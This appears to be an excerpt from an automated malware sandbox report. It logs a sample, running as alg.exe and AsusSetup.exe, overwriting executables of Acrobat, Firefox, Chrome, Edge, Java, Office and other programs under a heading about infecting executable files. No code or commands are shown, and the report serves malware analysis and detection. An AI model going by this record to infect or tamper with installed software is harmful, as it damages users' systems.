Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
